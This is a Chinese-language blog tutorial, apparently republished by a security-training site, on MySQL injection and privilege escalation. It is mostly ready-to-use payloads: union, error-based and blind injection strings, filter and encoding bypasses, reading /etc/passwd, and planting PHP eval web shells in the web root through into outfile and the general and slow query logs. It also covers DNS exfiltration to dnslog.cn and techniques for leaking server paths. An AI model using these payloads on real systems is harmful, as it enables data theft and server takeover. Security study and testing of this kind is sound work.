主頁 >  其他 > 資料庫注入提權總結(一)

資料庫注入提權總結(一)

2022-08-10 07:50:02 其他

MYSQL

基礎注入

聯合查詢

  • 若前面的查詢結果不為空,則回傳兩次查詢的值:

  • 若前面的查詢結果為空,則只回傳union查詢的值:

  • 關鍵字union select

  • 需要欄位數對應

常用Payload:
?
# 查詢表名
' union select group_concat(table_name) from information_schema.tables where table_schema=database()%23
# 查詢欄位名
' union select group_concat(column_name) from information_schema.columns where table_name='table1'%23

報錯注入

報錯注入是利用mysql在出錯的時候會引出查詢資訊的特征,常用的報錯手段有如下10種:

# 修改select user() 欄位 獲取不同的資訊
?
# 1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
?
# 2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
?
# 3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
?
# 4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
?
# 5.multipoint()
?
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
?
6.polygon()
?
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
?
7.multipolygon()
?
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
?
8.linestring()
?
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
?
9.multilinestring()
?
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
?
10.exp()
?
select * from test where id=1 and exp(~(select * from(select user())a));

布爾盲注

常見的布爾盲注場景有兩種,一是回傳值只有True或False的型別,二是Order by盲注,

回傳值只有True或False的型別

如果查詢結果不為空,則回傳True(或者是Success之類的),否則回傳False

這種注入比較簡單,可以挨個猜測表名、欄位名和欄位值的字符,通過回傳結果判斷猜測是否正確

例:parameter=’ or ascii(substr((select database()) ,1,1))<115—+

Orderby盲注

order by rand(True)和order by rand(False)的結果排序是不同的,可以根據這個不同來進行盲注:

例:order by rand(database()='pdotest')

回傳了True的排序,說明database()=’pdotest’是正確的值

時間盲注

其實大多數頁面,即使存在sql注入也基本是不會有回顯的,因此這時候就要用延時來判斷查詢的結果是否正確,

常見的時間盲注有:

1.sleep(x)

id=' or sleep(3)%23
?
id=' or if(ascii(substr(database(),1,1))>114,sleep(3),0)%23

查詢結果正確,則延遲3秒,錯誤則無延時,

2.benchmark()

通過大量運算來模擬延時:

id=' or benchmark(10000000,sha(1))%23
?
id=' or if(ascii(substr(database(),1,1))>114,benchmark(10000000,sha(1)),0)%23

本地測驗這個值大約可延時3秒:

3.笛卡爾積

計算笛卡爾積也是通過大量運算模擬延時:

select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C
?
select balabala from table1 where '1'='2' or if(ascii(substr(database(),1,1))>0,(select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C),0)

笛卡爾積延時大約也是3秒

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

HTTP頭注入

注入手法和上述相差不多,就是注入點發生了變化

HTTP分割注入

常見場景,登錄處SQL陳述句如下,注釋符號被過濾

select xxx from xxx where username=’xxx’ and password=’xxx’
# 方法一
username=1' or extractvalue/*
password=1*/(1,concat(0x7e,(select database()),0x7e))or'
?
SQL陳述句最終變為
select xxx from xxx where username='1' or extractvalue/*’ and password=’*/(1,concat(0x7e,(select database()),0x7e))or''
?
# 方法二
username=1' or if(ascii(substr(database(),1,1))=115,sleep(3),0) or '1
password=1
select * from users where username='1' or if(ascii(substr(database(),1,1))>0,sleep(3),0) or '1' and password='1'

二次注入

二次注入主要出現在updateselect結合點,如注冊之后在登錄

攻擊者構造的惡意payload首先會被服務器存盤在資料庫中,在之后取出資料庫在進行SQL陳述句拼接時產生的SQL注入問題

SQL約束攻擊

假如注冊時username引數在mysql中為字串型別,并且有unique屬性,設定了長度為VARCHAR(20),

則我們注冊一個username為admin[20個空格]asd的用戶名,則在mysql中首先會判斷是否有重復,若無重復,則會截取前20個字符加入到資料庫中,所以資料庫存盤的資料為admin[20個空格],而進行登錄的時候,SQL陳述句會忽略空格,因此我們相當于覆寫了admin賬號,

基礎繞過

大小寫繞過

用于過濾時沒有匹配大小寫的情況:
?
SelECt * from table;

雙寫繞過

用于將禁止的字符直接刪掉的過濾情況如:
?
preg_replace(‘/select/‘,’’,input)
?
則可用seselectlect from xxx來繞過,在洗掉一個select后剩下的就是select from xxx

繞過空格

當空格被過濾時,可以使用/**/ () %0a %09進行繞過

使用16進制繞過特定字符

如果在查詢欄位名的時候表名被過濾,或是資料庫中某些特定字符被過濾,則可用16進制繞過:

select column_name from information_schema.columns where table_name=0x7573657273;

0x7573657273為users的16進制

只能針對表名,欄位名等,內置函式關鍵字,不能使用16進制替代

寬位元組、Latin1默認編碼

寬位元組注入

用于單引號被轉義,但編碼為gbk編碼的情況下,用特殊字符將其與反斜杠合并,構成一個特殊字符:

username = %df'#
經gbk解碼后變為:
select * from users where username ='運'#

成功閉合了單引號,

Latin1編碼

Mysql表的編碼默認為latin1,如果設定字符集為utf8,則存在一些latin1中有而utf8中沒有的字符,而Mysql是如何處理這些字符的呢?直接忽略

于是我們可以輸入?username=admin%c2,存盤至表中就變為了admin

上面的%c2可以換為%c2-%ef之間的任意字符

常見字符的替代

and -> &&
or -> ||
空格-> /**/ -> %a0 -> %0a -> +
# -> --+ -> ;%00(php<=5.3.4) -> or '1'='1
= -> like -> regexp -> <> -> in
注:regexp為正則匹配,利用正則會有些新的注入手段

逗號被過濾

# 用join代替:
-1 union select 1,2,3
-1 union select * from (select 1)a join (select 2)b join (select 3)c%23
?
# limit:
limit 2,1
limit 1 offset 2
?
# substr:
substr(database(),5,1)
substr(database() from 5 for 1) from為從第幾個字符開始,for為截取幾個
substr(database() from 5)
# 如果for也被過濾了
mid(REVERSE(mid(database()from(-5)))from(-1)) reverse是反轉,mid和substr等同
?
# if:
if(database()=’xxx’,sleep(3),1)
id=1 and databse()=’xxx’ and sleep(3)
select case when database()=’xxx’ then sleep(5) else 0 end

limit被過濾

select user from users limit 1
?
加限制條件,如:
?
select user from users group by user_id having user_id = 1 (user_id是表中的一個column)

information_schema被過濾

innodb引擎可用mysql.innodb_table_stats、innodb_index_stats,日志將會把表、鍵的資訊記錄到這兩個表中
?
除此之外,系統表sys.schema_table_statistics_with_buffer、sys.schema_auto_increment_columns用于記錄查詢的快取,某些情況下可代替information_schema

檔案讀寫

讀寫權限

在進行MySQL檔案讀寫操作之前要先查看是否擁有權限,mysql檔案權限存放于mysql表的file_priv欄位,對應不同的User,如果可以讀寫,則資料庫記錄為Y,反之為N:

我們可以通過user()查看當前用戶是什么,如果對應用戶具有讀寫權限,則往下看,反之則放棄這條路找其他的方法,

除了要查看用戶權限,還有一個地方要查看,即secure-file-priv,它是一個系統變數,用于限制讀寫功能,它的值有三種:

(1)無內容,即無限制

(2)為NULL,表示禁止檔案讀寫

(3)為目錄名,表示僅能在此目錄下讀寫

該配置項存放在my.ini中,修改之后必須重啟mysql重新加載組態檔

讀檔案

如果滿足上述2個條件,則可嘗試讀寫檔案了,

常用的讀檔案的陳述句有如下幾種:

select load_file(file_path);
load data infile "/etc/passwd" into table 庫里存在的表名 FIELDS TERMINATED BY 'n'; #讀取服務端檔案
load data local infile "/etc/passwd" into table 庫里存在的表名 FIELDS TERMINATED BY 'n'; #讀取客戶端檔案

需要注意的是,file_path必須為絕對路徑,且反斜杠需要轉義:

寫檔案

select 1,"<?php eval($_POST['cmd']);?>" into outfile '/var/www/html/1.php';
select 2,"<?php eval($_POST['cmd']);?>" into dumpfile '/var/www/html/1.php';

當secure_file_priv值為NULL時,可用生成日志的方法繞過:

set global general_log_file = '/var/www/html/1.php';
set global general_log = on;

日志除了general_log還有其他許多日志,實際場景中需要有足夠的寫入日志的權限,且需要堆疊注入的條件方可采用該方法,因此利用非常困難,

DNS外帶注入

若用戶訪問DNS服務器,則會在DNS日志中留下記錄,如果請求中帶有SQL查詢的資訊,則資訊可被帶出到DNS記錄中,

利用條件:

1.secure_file_priv為空且有檔案讀取權限

2.目標為windows(利用了UNC,Linux不可行)

3.無回顯且無法時間盲注

利用方法:

可以找一個免費的DNSlog:http://dnslog.cn/

進入后可獲取一個子域名,執行:

select load_file(concat('\\',(select database()),'.子域名.dnslog.cn'));

相當于訪問了select database().子域名.dnslog.cn,于是會留下DNSLOG記錄,可從這些記錄中查看SQL回傳的資訊,

mysql getshell

檔案匯出函式GetShell

利用條件

  • 資料庫當前用戶為root權限

  • 知道當前網站的絕對路徑

  • PHP的GPC為off狀態

  • 寫入的那個歌路徑存在寫入權限

基于聯合查詢時

?id=1 union select 1,'<?php phpinfo();?>',3 into outfile '網站根目錄絕對路徑'-- qwe
?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile '網站根目錄絕對路徑'-- qwe

非聯合查詢

?id=1 into outfile '網站根目錄絕對路徑' FIELDS TERMINATED BY '<?php phpinfo();?>'-- qwe

這個陳述句的意思是,匯出當前資料表到xxx檔案中,資料表中的欄位以<?php phpinfo();?>分隔

形如:

id username password 匯出后會變成
id<?php phpinfo();?>username<?php phpinfo();?>password

outfile和dumpfile的區別

outfile:

  1. 支持多行資料同時匯出

  2. 使用union聯合查詢時,要保證兩側查詢的列數相同

  3. 會在換行符制表符后面追加反斜杠

  4. 會在末尾追加換行

dumpfile:

  1. 每次只能匯出一行資料

  2. 不會在換行符制表符后面追加反斜杠

  3. 不會在末尾追加換行

因此,dumpfile函式這個函式來順利寫入二進制檔案,當然into outfile函式也可以寫入二進制檔案,但是無法生效(追加的反斜杠會使二進制檔案無法生效),當使用dumpfile函式時,應該手動添加limit限制來獲取不同的行數,

secure_file_prive

寫檔案提權,終究是離不開這個配置項:

secure_file_prive= ,結果為空的話,表示允許任何檔案讀寫
?
secure_file_prive=NULL,表示不允許任何檔案讀寫
?
secure_file_prive=‘某個路徑’,表示這個路徑作為檔案讀寫的路徑
?
在mysql5.5版本前,都是默認為空,允許讀取
?
在mysql5.6版本后 ,默認為NULL,并且無法用SQL陳述句對其進行修改,所以這種只能在配置進行修改,

查詢該引數配置的情況:

show global variables like "%secure%";

利用sql陳述句修改配置項(5.6版本以前,臨時修改重啟失效):

set global secure_file_prive=""

5.6版本以后,只能利用配置項修改:

日志GetShell

全域日志Getshell

利用general_log,可以將所有到達mysql服務器的sql陳述句,都記錄下來

# 查看日志是否開啟
show variables like 'general_log';
?
# 開啟日志功能
set global geeral_log=on;
?
# 查看檔案日志保存位置
show variables like 'general_log_file';
?
# 設定日志保存位置(getshell的話存放在網站根目錄,名為.php)
set global general_log_file='/var/www/html/shell.php';
?
# 查看日志輸出型別 table:將日志存入資料庫的日志表中;file:將日志存入檔案中
show variables like 'log_output';
?
# 修改日志存盤型別
set global log_output='table/file';

GetShell方式:

set global geeral_log=on;
set global general_log_file='/var/www/html/shell.php';
select '<?php eval($_POST[8]);?>'

慢日志GetShell

一般都是通過long_query_time選項來設定這個時間值,時間以秒為單位,可以精確到微秒,如果查詢時間超過了這個時間值(默認為10秒),這個查詢陳述句將被記錄到慢查詢日志中,查看服務器默認時間值方式

# 查看服務器默認時間值方式
show global variables like '%long_query_time%'
show global variables like '%long%'
?
# 查看慢日志引數
show global variable like '%slow%';

GetShell方式:

# 打開慢日志
set global slow_query_log=on
?
# 設定慢日志路徑
set global slow_query_log_file='/var/www/html/shell.php'
?
# 記錄到日志中的陳述句
select '<?php @eval($_POST[8]);?>' or sleep(20)

爆絕對路徑的方法

上述的提權方式都離不開知道網站的絕對路徑,下面是一些得到絕對路徑的方法,

單引號爆路徑

  • 直接在URL后面加單引號,要求單引號沒有被過濾(gpc=off)且服務器默認回傳錯誤資訊,www.xxx.com/news.php?id=1′

錯誤引數值爆路徑

  • 將要提交的引數值改成錯誤值,比如-1,-99999單引號被過濾時不妨試試,www.xxx.com/researcharchive.php?id=-1

Google爆路徑

  • 結合關鍵字和site語法搜索出錯頁面的網頁快照,常見關鍵字有warning和fatal error,注意,如果目標站點是二級域名,site接的是其對應的頂級域名,這樣得到的資訊要多得多,

Site:xxx.edu.tw warning
Site:xxx.com.tw “fatal error”

測驗檔案爆路徑

  • 很多網站的根目錄下都存在測驗檔案,腳本代碼通常都是phpinfo(),

www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php

phpmyadmin爆路徑

  • 一旦找到phpmyadmin的管理頁面,再訪問該目錄下的某些特定檔案,就很有可能爆出物理路徑,至于phpmyadmin的地址可以用wwwscan這類的工具去掃,也可以選擇google,

/phpmyadmin/libraries/lect_lang.lib.php
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
load_file()
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php

組態檔找路徑

  • 如果注入點有檔案讀取權限,就可以手工load_file或工具讀取組態檔,再從中尋找路徑資訊(一般在檔案末尾),各平臺下Web服務器和PHP的組態檔默認路徑可以上網查,這里列舉常見的幾個,

Windows:
c:\windows\php.ini php組態檔
c:\windows\system32\inetsrv\MetaBase.xml IIS虛擬主機組態檔
?
?
Linux:
/etc/php.ini php組態檔
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache組態檔
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf 虛擬目錄組態檔

Linux

為什么要把Linux單獨提出來說,因為Linux的權限控制很嚴格,有的時候即使我們完全控住了MYSQL 但是 沒有對網站根目錄的讀寫權限,也會很沒有辦法去利用上述方法寫shell,

更多靶場實驗練習、網安學習資料,請點擊這里>>

 

搜索

復制

合天智匯:合天網路靶場、網安實戰虛擬環境

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/501339.html

標籤:其他

上一篇:Content Security Policy(CSP)應用及說明

下一篇:第四講 SVN

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more